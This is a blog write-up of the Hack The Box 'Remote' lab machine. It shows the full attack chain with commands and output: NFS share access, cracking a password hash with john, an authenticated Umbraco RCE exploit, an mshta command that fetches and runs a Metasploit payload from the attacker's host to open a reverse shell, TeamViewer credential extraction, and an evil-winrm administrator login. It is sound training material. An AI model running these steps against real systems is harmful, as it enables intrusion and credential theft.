It doesn’t matter how many times you get knocked down. All that matters is you get up one more time than you were knocked down.
Roy T. Bennett
About Remote
In this post, I’m writing a write-up for the machine Remote from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Remote is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.
Foothold
After the portscan, I found that this box is hosting a website, which is reachable on port 80/tcp. To login on the backend, there are some credentials needed. These credentials can be found in the Umbraco.sdf database hosted on an NFS share. After login on to the backend of the website, I notice that this website uses the Umbraco CMS.
User
The website is using Umbraco version 7.12.4 which contains an (Authenticated) Remote Command Execution Vulnerability. Through this RCE I was able to get the user flag by using the exploit modified by noraj.
Root
After basic enumeration, I found the remote service which can be exploited due to a vulnerability in Teamviewer Desktop version 7. Normally, I root a box manually. Because I think it would be nice to rooting a box with Metasploit once in a while, I have used Metasploit to root this machine.
Machine Info
Recon
Port scan with Nmap
As always I start with a portscan with Nmap.
1
nmap -sC -sV -oA ./nmap/remote.txt 10.10.10.180
The results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 16:53 EDT
Nmap scan report for 10.10.10.180
Host is up (0.079s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m13s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-21T20:56:23
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.87 seconds
There are several open ports.
21/TCP(FTP), anonymous ftp login allowed 🙂80/tcp(HTTP)111/tcp(SunRPC)135/tcp(Microsoft Windows RPC)139/tcp(NetBIOS)445/tcp(SMB)2049/tcp(Network File System (NFS)
Enumeration FTP
The File Transfer Protocol (FTP) is a protocol that can be used to transfer data between a client and a server on a network.
Nmap has found the FTP port with anonymous login allowed. I created an FTP session to this box through port 21. I logged in with username anonymous and as password anonymous.
1
2
3
4
5
6
7
8
9
10
11
12
13
~$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
I tried to get the contents and it seems that there are no files listed. Tried some other commando’s but no useful information comes back.
Enumeration Web Server
The Nmap scan found that the HTTP port is open. I checked the web service and there is a website hosted on this box. Acme Widgets is the name of this website.
On the Contact page, there is a button that redirects me to a login page. According to the source code, this website is using the open-source CMS Umbraco. I have tried the default username admin and the default password Admin1234!, but no luck. I need to find the credentials. Umbraco is usually using the Umbraco.sdf database file for storing credentials.
Let’s check the NFS, maybe I have access to this database file.
Enumeration NFS (Network File System)
The next step is to do some enumeration on the NFS port 2049. It seems that there is an NFS share.
1
2
3
kali@kali:/home/htb/boxes/remote$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
Now, I can mount that share and walk through the files. In my working directory, I create a directory called tb_mount.
1
2
3
~$ mount -t nfs 10.10.10.180:/site_backups /home/htb/boxes/machines/remote/tb_mount/
~$ ls
App_Browsers App_Data App_Plugins aspnet_client bin Config css default.aspx Global.asax Media scripts Umbraco Umbraco_Client Views Web.config
It seems that I have access to the source files of the website. After a quick searching around I have found the Umbraco.sdf database file.
1
2
3
~$ cd App_Data
/App_Data$ ls
cache Logs Models packages TEMP umbraco.config Umbraco.sdf
With cat I can check the contents of this file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/App_Data$ cat Umbraco.sdf
VttyAdministratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d׃[email protected]
calb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50BiIfhVgvrfhVgXvadminadmin@htb.loca
lb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}[email protected][{"alias":"umbIntroIntroduction","co
mpleted":false,"disabled":true}][email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"
}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e?gAg.ogOgYwssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUA
dpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}[email protected]~
g)
g.og7
[email protected]+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}[email protected]
-4ab0-93f7-5ee9724c8d32#0 A$C=HDY^`FnyPHI KPM
@`CprGPLUHUH4-`II AEEqDD| 5!
Eq
Q
|p!p`@8~!PI@
|p!p~!PIEEqDD| 5!
Eq
Q
|p!p~!HH|
....
On the top in this file, there are some usernames listed and hashed passwords. The first hash is a SHA1 hash. I placed this hash in the file password.txt.
1
b8be16afba8c314ad33d812f22a04991b90e2aaa
Ok, it is now time for john.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
~$ john password.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 SSE2 4x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:01 DONE (2020-03-28 15:29) 0.6493g/s 6379Kp/s 6379Kc/s 6379KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
John has cracked the hash and found the password baconandcheese. Let’s try if we can login through the portal.
| Username: | [email protected] |
| Password: | baconandcheese |
I’m able to log in on the backend of this website. I’m now landed on the CMS system. On the bottom, there is a help question mark visible. Now the version of Umbraco is visible.
Exploitation
Remote Code Execution (RCE)
Let’s use searchsploit and check if there is a known vulnerability for this version of Umbraco.
1
2
3
4
5
6
7
8
9
10
~$ searchsploit Umbraco
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | exploits/windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | exploits/aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | exploits/php/webapps/44988.txt
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
There is an (Authenticated) Remote Code Execution for this version of Umbraco. As I have already access to the portal, I’m authenticated against this service. I can use the exploit 46153.py, although I can also use the modified exploit, created by noraj. However, I have used both exploits; with the first exploit I was able to create a reverse shell and with the exploit from noraj there is no reverse shell needed. I used the last exploit for this write-up.
Getting user access
I downloaded the exploit from Github.
1
2
3
4
5
6
7
~$ sudo git clone https://github.com/noraj/Umbraco-RCE
Cloning into 'Umbraco-RCE'...
remote: Enumerating objects: 25, done.
remote: Counting objects: 100% (25/25), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 25 (delta 8), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (25/25), 7.98 KiB | 371.00 KiB/s, done.
I launched this exploit by using this command below.
1
2
3
4
5
6
7
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'hostname; pwd; whoami'
remote
iis apppool\defaultapppool
Path
----
C:\windows\system32\inetsrv
The exploit worked and it seems that I have permissions as the user iis apppool\defaultapppool. After a little searching and poking around I found out that the user flag was in the C:\Users\Public directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'cd $env:public; ls'
Directory: C:\Users\Public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 4/2/2020 2:26 PM 34 user.txt
With this command below I can catch the user flag.
1
2
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'cd $env:public; cat user.txt'
e93cb767cba5bb6c03b1bb4fa3971019
Privilege Escalation
Enumeration
Now I have user privileges on this box, I need to enumerate further how I can escalate my privileges. First, I checked the running processes and it turns out that there is a TeamViewer_Service running. As the name of this box is Remote, coincidence does not exist, the name of this box is a hint towards this service.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'Get-Process'
...
115 7 1268 5400 5096 0 svchost
360 26 8504 17696 5524 0 svchost
229 15 4124 13552 5760 0 svchost
120 7 1360 5844 5920 0 svchost
160 9 2700 7296 6128 0 svchost
1581 0 192 148 4 0 System
1098 23 4976 18724 3068 0 TeamViewer_Service
178 12 3232 10312 3040 0 VGAuthService
122 8 1572 6404 1392 0 vmacthlp
298 21 5504 18336 2408 0 vmtoolsd
1560 125 283540 284652 22.00 1752 0 w3wp
175 11 1532 6884 480 0 wininit
254 12 2748 14288 548 1 winlogon
168 11 1564 7556 4984 0 WmiApSrv
368 16 8544 17852 4664 0 WmiPrvSE
569 26 15068 24616 5380 0 WmiPrvSE
Its important to know which version of Teamviewer is installed.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'Get-Service'
Status Name DisplayName
------ ---- -----------
...
Running SystemEventsBroker System Events Broker
Stopped TabletInputService Touch Keyboard and Handwriting Pane...
Stopped tapisrv Telephony
Running TeamViewer7 TeamViewer 7
Stopped TermService Remote Desktop Services
Running Themes Themes
Stopped TieringEngineSe... Storage Tiers Management
Running TimeBrokerSvc Time Broker
...
Teamviewer 7 is installed on this box. This is a very outdated version of Teamviewer. There should be definitely a way to exploit this service to perform a privilege escalation.
Exploitation
CVE-2019-18988
After a little search on the internet, I found this article https://whynotsecurity.com/blog/teamviewer/. This article describes the vulnerability CVE-2019-18988. This vulnerability works from Teamviewer Desktop version v7.0.43148 through version 14.7.1965. It allows a bypass of remote-login access control because the same key is used for different customers’ installations. With versions before v9.x , this allowed for attackers to decrypt the Unattended Access password to the system (which allows for remote login to the system as well as headless file browsing).
Normally, I do the exploit in the manual. But, this privilege escalation I will do by the use of Metasploit. Why? Because I think it would be nice to rooting a box with Metasploit once in a while. For this privilege escalation, I’m using the ‘post/windows/gather/credentials/teamviewer_passwords’ module from Metasploit.
1
2
3
4
5
6
7
8
msf5 > search teamviewer
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/credentials/teamviewer_passwords normal No Windows Gather TeamViewer Passwords
First, I need to create a reverse shell, before I can use this module. I decided to create a reverse shell with mshta.exe. This program runs the Microsoft HTML Application Host and is responsible for running HTML application files. This program is not considered harmful to your system, but you can use this by creating a reverse shell. Also Metasploit has a module for it.
1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 > use exploit/windows/misc/hta_server
msf5 exploit(windows/misc/hta_server) > set srvhost 10.10.14.31
srvhost => 10.10.14.31
msf5 exploit(windows/misc/hta_server) > set lhost 10.10.14.31
lhost => 10.10.14.31
msf5 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Using URL: http://10.10.14.31:8080/70UN29zyQv.hta
[*] Server started.
msf5 exploit(windows/misc/hta_server) >
I need to deliver this payload to this box.
1
~$ python3 exploit.py -u [email protected] -p "baconandcheese" -i http://10.10.10.180 -c powershell.exe -a 'mshta.exe http://10.10.14.31:8080/6JZCCUIx.hta'
The payload got delivered and I have now a reverse shell.The default behavior of Metasploit is that the shell is opening on the background. I need to interact with this session to exploit Teamviewer.
1
2
3
4
5
6
7
8
9
10
11
12
13
[*] Sending stage (180291 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.14.31:4444 -> 10.10.10.180:49704) at 2020-04-02 15:32:11 -0400
msf5 exploit(windows/misc/hta_server) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows IIS APPPOOL\DefaultAppPool @ REMOTE 10.10.14.31:4444 -> 10.10.10.180:49704 (10.10.10.180)
msf5 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
I’m now interacting with my reverse shell and the module to exploit Teamviewer can now be called from the meterpreter.
1
2
3
4
5
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/kali/.msf4/loot/20200402153617_default_10.10.10.180_host.teamviewer__104747.txt
Own Remote
I got now the password. Now I can try to establish a remote session with Evil-WinRM.
1
2
3
4
5
6
7
8
9
10
~$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
627c5d7c4a820ff0f9681531ace088ea
The box is now rooted. I have really enjoyed writing this post. Please drop me a respect, if you enyojed reading this write-up, I really appreciate. My profile: https://app.hackthebox.com/profile/224856.com/profile/224856.
Happy Hacking!